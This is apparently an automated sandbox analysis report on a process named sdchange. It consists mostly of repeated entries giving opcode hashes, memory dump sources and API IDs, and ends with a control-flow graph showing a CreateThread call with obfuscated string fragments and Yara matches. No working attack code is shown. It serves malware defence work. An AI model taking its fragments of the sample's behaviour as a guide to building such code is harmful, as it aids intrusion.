                                                                            • Instruction ID: 97cfb30e4392db13215d86470dbe1df8f9f97a8851cde8645a1f4ba870e7f716
                                                                            • Opcode Fuzzy Hash: 1f97e7dfcb22a3bc6c53eeeaaa5f28ed75f17e3437f6e437eb72f302a4e552b5
                                                                            • Instruction Fuzzy Hash: 3990023220181442F1007598A44864A00159BE1301F95E011A5024599EC66589916131
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 9374a6205506d1c91a5645a767d10c4bcd3ae123a320f268fa8ef9300fb64e07
                                                                            • Instruction ID: 83a5eafce7708388daf0c2c6bbaa0ce2d482bf4be5c48459603b60359ad8e8c6
                                                                            • Opcode Fuzzy Hash: 9374a6205506d1c91a5645a767d10c4bcd3ae123a320f268fa8ef9300fb64e07
                                                                            • Instruction Fuzzy Hash: 0B90023220189842F1107158D44474E00159BD1301F99D411A442469CD869589917121
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: c9b9e8f157750d4b13b054ac61103dc4796dbc62b42f6be887c677fcdd3dae3c
                                                                            • Instruction ID: d9c1a2e0f584407e467b8e923252b7336917e50ccfc154f757d57355b7191f53
                                                                            • Opcode Fuzzy Hash: c9b9e8f157750d4b13b054ac61103dc4796dbc62b42f6be887c677fcdd3dae3c
                                                                            • Instruction Fuzzy Hash: 3B90023220181882F10071589444B4A00159BE1301F95D016A0124698D8615C9517521
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: b4e4a7eed343a1b6a1bbf3f6e0222b2242ddefb5dcf109bf0406937e37eeb4cc
                                                                            • Instruction ID: 10e44102a3d38ea7fc7baad02e79c24c05caba54c0eaba6abcc8df56e4086e24
                                                                            • Opcode Fuzzy Hash: b4e4a7eed343a1b6a1bbf3f6e0222b2242ddefb5dcf109bf0406937e37eeb4cc
                                                                            • Instruction Fuzzy Hash: 0790023220181453F1117158954470B00199BD1241FD5D412A042459CD96568A52A121
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 3c3feb96809d05b751c81da67d1470d7d67fde86912a5df931078421692baf74
                                                                            • Instruction ID: 4e1cc6dac5112e681ee6a20ad40484a07e582526583191d8f162691484dcdbc9
                                                                            • Opcode Fuzzy Hash: 3c3feb96809d05b751c81da67d1470d7d67fde86912a5df931078421692baf74
                                                                            • Instruction Fuzzy Hash: F4900222242851927545B158944450B4016ABE1241BD5D012A1414994C85269956D621
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 8438cee6d11d942743067d31047586381f7f2c3c7efd85592e1f5f8e1f1209ad
                                                                            • Instruction ID: 956e21bc8e1e2148ab87b622068e724ef16653c7926da7c0aa524d0e56d8a653
                                                                            • Opcode Fuzzy Hash: 8438cee6d11d942743067d31047586381f7f2c3c7efd85592e1f5f8e1f1209ad
                                                                            • Instruction Fuzzy Hash: 1190022230181043F1407158A45860A4015EBE2301F95E011E0414598CD91589565222
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 1786434af75cf4b2dc1e5778325332ace4bf8841550fa53210875f35cc027750
                                                                            • Instruction ID: 089e0bf1369fa9e4d64aaa4510a42ef76f26d718f3f66afd40cb64ff711d2c50
                                                                            • Opcode Fuzzy Hash: 1786434af75cf4b2dc1e5778325332ace4bf8841550fa53210875f35cc027750
                                                                            • Instruction Fuzzy Hash: E690022A21381042F1807158A44860E00159BD2202FD5E415A001559CCC91589695321
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 469e659bb78f8507b69dc56197f4a52dfaa36cf9650935512e1887771d3335b9
                                                                            • Instruction ID: 7e7b6ce06053ac7729d97ccb2fc06c9052ed2e9b47f008643ddfb741ea4e7387
                                                                            • Opcode Fuzzy Hash: 469e659bb78f8507b69dc56197f4a52dfaa36cf9650935512e1887771d3335b9
                                                                            • Instruction Fuzzy Hash: BC900262201C1443F1407558984460B00159BD1302F95D011A2064599E8A298D516135
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 0e0f49fed1238758823d29fb1bd7c72a22bd8ea8c2c34d073fc4ec852deda997
                                                                            • Instruction ID: 7ad31666a581010b33a880b2d3a96f7a7a9451b424da9cf304e594ea03355232
                                                                            • Opcode Fuzzy Hash: 0e0f49fed1238758823d29fb1bd7c72a22bd8ea8c2c34d073fc4ec852deda997
                                                                            • Instruction Fuzzy Hash: 0F90022260181542F1017158944461A001A9BD1241FD5D022A1024599ECA258A92A131
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: ca9a297014310445802e2820d17edb86fee5fa936f95e08bc9f94c7b135dc6c7
                                                                            • Instruction ID: 428e8d64c32dd9d38d932e16dcb5a90afcc906395fd8b012459c4fa8e24e5174
                                                                            • Opcode Fuzzy Hash: ca9a297014310445802e2820d17edb86fee5fa936f95e08bc9f94c7b135dc6c7
                                                                            • Instruction Fuzzy Hash: AF900222211C1082F20075689C54B0B00159BD1303F95D115A0154598CC91589615521
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 03fd44fb2bbac110cd24828708de0db07b0736df69addaa47e5076ca7578697a
                                                                            • Instruction ID: 1548a99a58906da3b6ce35087cae230bbec200d76d3e85604bcef4f0b037d9ff
                                                                            • Opcode Fuzzy Hash: 03fd44fb2bbac110cd24828708de0db07b0736df69addaa47e5076ca7578697a
                                                                            • Instruction Fuzzy Hash: E09002226018108261407168D88490A4015BFE2211B95D121A0998594D855989655665
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 732f45c3acdd82725949f892847677b7a69ff5b28eac5911a452beb716a2e2c9
                                                                            • Instruction ID: 6b1faec685d8bebe046083da63727efd34d90ba0a7f3c953a6d25c8258bfb4a5
                                                                            • Opcode Fuzzy Hash: 732f45c3acdd82725949f892847677b7a69ff5b28eac5911a452beb716a2e2c9
                                                                            • Instruction Fuzzy Hash: 1690026234181482F10071589454B0A0015DBE2301F95D015E1064598D8619CD526126
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: d6d42d286eb0a85b21172e7e9de51271ca863d7d801c77074568213d8a4b05e5
                                                                            • Instruction ID: fad19bca6dec2e17387269ed92c777227aeb2c6f3c085ee02e87965583cfc040
                                                                            • Opcode Fuzzy Hash: d6d42d286eb0a85b21172e7e9de51271ca863d7d801c77074568213d8a4b05e5
                                                                            • Instruction Fuzzy Hash: C6900226221810422145B558564450F0455ABD73517D5D015F14165D4CC62189655321
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 4cfdaec70c6fda7fbe952012ee6201df6acf5de782ab8cda6dfaee5370222bba
                                                                            • Instruction ID: b70e43aae69bbcc5f81b318b017723d6932cd0ca1d8ee1077feaa662f9814878
                                                                            • Opcode Fuzzy Hash: 4cfdaec70c6fda7fbe952012ee6201df6acf5de782ab8cda6dfaee5370222bba
                                                                            • Instruction Fuzzy Hash: A3900226211810432105B558574450B00569BD6351795D021F1015594CD62189615121
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: de2b6ff1bae511cbfbed18111f4588b4380c7f18108ffae221b40037b5568235
                                                                            • Instruction ID: 7535baeed967313831659a2f11bb065ed2b4fccfbf9f6e2aa84dffaf5edb4442
                                                                            • Opcode Fuzzy Hash: de2b6ff1bae511cbfbed18111f4588b4380c7f18108ffae221b40037b5568235
                                                                            • Instruction Fuzzy Hash: BB90023220181842F1807158944464E00159BD2301FD5D015A0025698DCA158B5977A1
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: cf828191af1e82f0ec33319202ed4f0afaf0bd51f4bc1ead8923bf583b501f7b
                                                                            • Instruction ID: e05a1043a510a3d89214f0c97df32a35e759b33bcb58e5b956f543220f9376f9
                                                                            • Opcode Fuzzy Hash: cf828191af1e82f0ec33319202ed4f0afaf0bd51f4bc1ead8923bf583b501f7b
                                                                            • Instruction Fuzzy Hash: FA90023220585882F14071589444A4A00259BD1305F95D011A00646D8D96258E55B661
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: ecf7861cb142c9c661c1e0673cec00c9f83a4b5754b312b6ca32b13469a9109a
                                                                            • Instruction ID: 116fc227f2f167e92a026d467de72bedfa29625bcebe3cb59099182277b78fe1
                                                                            • Opcode Fuzzy Hash: ecf7861cb142c9c661c1e0673cec00c9f83a4b5754b312b6ca32b13469a9109a
                                                                            • Instruction Fuzzy Hash: B690023260581842F1507158945474A00159BD1301F95D011A0024698D87558B5576A1
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: d1430cbda6f6e73a1c0194be0292f869f90bad668933ca230d851c8d750fe860
                                                                            • Instruction ID: 4d35a5ff24f44a40b02e128725167e93fdc68e73d8d8ec6677b6c7e1c289e994
                                                                            • Opcode Fuzzy Hash: d1430cbda6f6e73a1c0194be0292f869f90bad668933ca230d851c8d750fe860
                                                                            • Instruction Fuzzy Hash: E79002622028104361057158945461A401A9BE1201F95D021E10145D4DC52589916125
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 7e42806159b721dbd439230afcc415d7440152868edce9026bba3d9c177de711
                                                                            • Instruction ID: 41d9ee62834b9cd29c41d93c4090af594e13f18626d25783be9b3b44ab2dad6b
                                                                            • Opcode Fuzzy Hash: 7e42806159b721dbd439230afcc415d7440152868edce9026bba3d9c177de711
                                                                            • Instruction Fuzzy Hash: 7090023260591442F1007158955470A10159BD1201FA5D411A04245ACD87958A5165A2
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F80000, based on PE: true
                                                                            • Associated: 00000006.00000002.2885751351.00000000050A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.00000000050AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_4f80000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 48d75ef67bb6081fab64c30a492b0973f0dc5a01e456e9e2a1da72768a2ebb82
                                                                            • Instruction ID: 33b3a6f205349a69b2c8a1c318b7caf45ed51fabff62261a3fea847ec9752cc6
                                                                            • Opcode Fuzzy Hash: 48d75ef67bb6081fab64c30a492b0973f0dc5a01e456e9e2a1da72768a2ebb82
                                                                            • Instruction Fuzzy Hash: D590022224586142F150715C944461A4015BBE1201F95D021A08145D8D855589556221
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2886136469.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_52d0000_sdchange.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 47f33bccae8d6bd696f568f23823febc77db89f00c76d9ae45e22dbde362bb31
                                                                            • Instruction ID: a27c8d96d6ab1e76c5e7f510948019ac8120075733a70615a981eef7abaf2da3
                                                                            • Opcode Fuzzy Hash: 47f33bccae8d6bd696f568f23823febc77db89f00c76d9ae45e22dbde362bb31
                                                                            • Instruction Fuzzy Hash: C0D0955207D045CFC201ED78CD9658B33559353020316A7FC4072CB3D3D511C00701E9

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 29 30b9ee7-30b9eeb 30 30b9eed-30ba240 29->30 31 30b9ed2-30b9edc CreateThread 29->31 33 30ba251-30ba25a 30->33 34 30ba26e 33->34 35 30ba25c-30ba26c 33->35 37 30ba275-30ba27c 34->37 35->33 38 30ba27e-30ba290 37->38 39 30ba2a6-30ba2b7 37->39 40 30ba292-30ba296 38->40 41 30ba297-30ba299 38->41 42 30ba2c8-30ba2d4 39->42 40->41 43 30ba29b-30ba2a1 41->43 44 30ba2a4 41->44 45 30ba2e6 42->45 46 30ba2d6-30ba2dc 42->46 43->44 44->37 49 30ba2ed-30ba306 45->49 47 30ba2de-30ba2e1 46->47 48 30ba2e4 46->48 47->48 48->42 49->49 51 30ba308-30ba311 49->51 52 30ba552-30ba55c 51->52 53 30ba317-30ba323 51->53 54 30ba56d-30ba576 52->54 55 30ba342-30ba34b 53->55 56 30ba325-30ba340 53->56 59 30ba578-30ba584 54->59 60 30ba586-30ba58a 54->60 57 30ba34d-30ba365 55->57 58 30ba367-30ba37a 55->58 56->53 57->55 61 30ba38b-30ba394 58->61 59->54 63 30ba58c-30ba593 60->63 64 30ba596-30ba5a0 60->64 65 30ba396-30ba3a2 61->65 66 30ba3a4-30ba3ae 61->66 63->64 67 30ba5b1-30ba5bd 64->67 65->61 71 30ba3bf-30ba3c8 66->71 68 30ba5bf-30ba5d2 67->68 69 30ba5d4-30ba5db 67->69 68->67 73 30ba5dd-30ba5e1 69->73 74 30ba614-30ba61b 69->74 75 30ba3ca-30ba3d3 71->75 76 30ba3e0-30ba3ef 71->76 77 30ba60f call 30db5b0 73->77 78 30ba5e3-30ba60d 73->78 79 30ba61d-30ba650 74->79 80 30ba652-30ba65c 74->80 81 30ba3de 75->81 82 30ba3d5-30ba3db 75->82 83 30ba4bf-30ba4d3 76->83 84 30ba3f5-30ba3ff 76->84 77->74 78->73 79->74 86 30ba66d-30ba676 80->86 81->71 82->81 88 30ba4e4-30ba4f0 83->88 89 30ba410-30ba41c 84->89 90 30ba678-30ba681 86->90 91 30ba68e-30ba697 86->91 92 30ba508-30ba512 88->92 93 30ba4f2-30ba4fb 88->93 94 30ba41e-30ba42b 89->94 95 30ba42d-30ba437 89->95 99 30ba68c 90->99 100 30ba683-30ba689 90->100 101 30ba699-30ba6b4 91->101 102 30ba6b6-30ba6c0 91->102 96 30ba523-30ba52f 92->96 103 30ba4fd-30ba503 93->103 104 30ba506 93->104 94->89 97 30ba448-30ba454 95->97 106 30ba54d 96->106 107 30ba531-30ba53d 96->107 108 30ba46a-30ba474 97->108 109 30ba456-30ba468 97->109 99->86 100->99 101->91 103->104 104->88 106->51 112 30ba54b 107->112 113 30ba53f-30ba545 107->113 111 30ba485-30ba48e 108->111 109->97 115 30ba49f-30ba4b8 111->115 116 30ba490-30ba49d 111->116 112->96 113->112 115->115 118 30ba4ba 115->118 116->111 118->52
                                                                            APIs
                                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 030B9ED2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateThread
                                                                            • String ID: #$&J$4$4$4$$<;$<m$N=$NI$P$SK$Y$c>$d$e$$jB$jG$l$n$u$xs$z^$~
                                                                            • API String ID: 2422867632-2792551584
                                                                            • Opcode ID: 3596986e2661773b01e24a489eed8831cb64a03b2a406b41ec6d5a4d05ccb573
                                                                            • Instruction ID: 5d7a918d5cb0992d70d32f253803be9ea4fd944976edf66bb5a10143111f6483
                                                                            • Opcode Fuzzy Hash: 3596986e2661773b01e24a489eed8831cb64a03b2a406b41ec6d5a4d05ccb573
                                                                            • Instruction Fuzzy Hash: C68139B0D05269CBEB60CF85C9987DEBBB1BB45308F1081D9D1587B381C7BA1A89CF95
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InitializeUninitialize
                                                                            • String ID: @J7<
                                                                            • API String ID: 3442037557-2016760708
                                                                            • Opcode ID: 34c8baee2a77d5ea7277947764e9e7f664c9addba69075f4f2ba6d5eebf112fe
                                                                            • Instruction ID: a8a7a0405072c33cf74ff3d76a9fa9b74bc2f0ea9966809a8f94343516f71563
                                                                            • Opcode Fuzzy Hash: 34c8baee2a77d5ea7277947764e9e7f664c9addba69075f4f2ba6d5eebf112fe
                                                                            • Instruction Fuzzy Hash: EB316376A1020AAFCF10DFD8D8809EEB7B9FF88304B104559E505EB214D771EE05CBA1
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_30b0000_sdchange.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InitializeUninitialize
